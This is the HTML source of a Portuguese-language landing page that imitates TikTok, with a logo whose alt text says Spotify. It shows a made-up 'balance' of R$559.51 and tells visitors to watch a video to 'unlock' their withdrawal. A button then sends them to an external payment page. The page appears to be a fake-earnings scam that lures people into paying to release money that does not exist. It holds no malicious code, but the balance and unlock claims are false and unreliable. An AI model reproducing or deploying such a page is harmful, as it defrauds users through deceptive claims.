<!DOCTYPE html><html lang="pt-BR"><head>    <link href="https://fonts.googleapis.com/css2?family=Sora:wght@500&display=swap" rel="stylesheet">

    
</script><link href="cdn/shopifycloud/boomerang/shopify-boomerang-1.0.0.min.js" rel="preload" as="script">




<style>
    * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
    }

    body {
        font-family: 'Montserrat', sans-serif;
        background-color: #FFFFFF;
        color: #333;
        display: flex;
        flex-direction: column;
        align-items: center;
    }

    /* Cabeçalho */
    .header {
        width: 100%;
        background-color: #ff0150;
        color: white;
        font-weight: bold;
        text-align: center;
        padding: 10px;
        font-size: 16px;
    }

    /* Container Principal */
    #p1 {
        width: 100%;
        max-width: 400px;
        background-color: #FFFFFF;
        padding: 15px;
        border-bottom: 1px solid #202020;
        display: flex;
        align-items: center;
        justify-content: space-between;
        margin-bottom: 20px;
    }

    #logo {
        width: 130px; /* Aumenta o tamanho do logotipo */
        margin-left: 5px;
    }

    .boxSaldo {
        display: flex;
        flex-direction: column;
        align-items: flex-end;
        border: 2px solid #ff0150;
        border-radius: 6px;
        padding: 5px 10px;
        margin-right: 5px;
    }

    .textoSaldo {
        font-size: 10px;
        font-weight: bold;
        background: #fff;
        padding: 2px 14px;
        color: #333;
    }

    .valorSaldo {
        font-size: 14px;
        font-weight: 700;
        color: #333;
    }

    /* Conteúdo do Vídeo */
    #produto1 {
        width: 100%;
        max-width: 400px;
        text-align: center;
        padding: 15px;
    }

    #produto1 h4 {
        color: #ff0150;
        font-size: 18px;
        margin-bottom: 10px;
    }

    #video-container {
        width: 100%;
        max-width: 360px;
        margin: 0 auto;
        overflow: hidden;
        border: 2px solid #ff0150;
        border-radius: 8px;
        margin-bottom: 20px;
        position: relative;
        
    }

    iframe {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        border: none;
    }

    /* Botão */
    .centralizar {
        width: 100%;
        display: flex;
        justify-content: center;
        
    }

    button {
        background-color: #ff0150;
        color: white;
        border: none;
        border-radius: 5px;
        width: 85%;
        max-width: 300px;
        height: 50px;
        font-weight: bold;
        cursor: pointer;
        transition: background-color 0.3s;
        margin: 2%;
    }

    button:hover {
        background-color: #e66a00;
    }

    /* Responsividade */
    @media (max-width: 480px) {
        #p1 {
            flex-direction: row;
            justify-content: space-between;
        }
    }
</style>
</head>

<body>
<div class="header">
    ASSISTA O VÍDEO ABAIXO PARA LIBERAR SEU SAQUE E ACESSO VITALÍCIO.
</div>

<div id="p1">
    <img id="logo" src="images/tiktoklogo.svg" alt="Spotify Logo">
    <div class="boxSaldo">
        <span class="textoSaldo">SALDO</span>
        <span class="valorSaldo">R$ <span class="saldoAtualizado">559.51</span></span>
    </div>
</div>

<div id="produto1">
    <h4>DESBLOQUEIO DE SALDO</h4>
    <p>Veja como liberar seu saque assistindo ao vídeo.</p>

    <div id="video-container">
        <video src="./media/vsl tiktok.mp4"
        controls
        width="350"
        autoplay
        poster="./images/capattk.png"></video>
    </div>

    <div class="centralizar">
        <a href="https://go.tribopay.com.br/xnvl0" style="width: 100%; text-decoration: none;">
            <button><span>DESBLOQUEAR AGORA</span></button>
        </a>
    </div>
</div>


</body></html>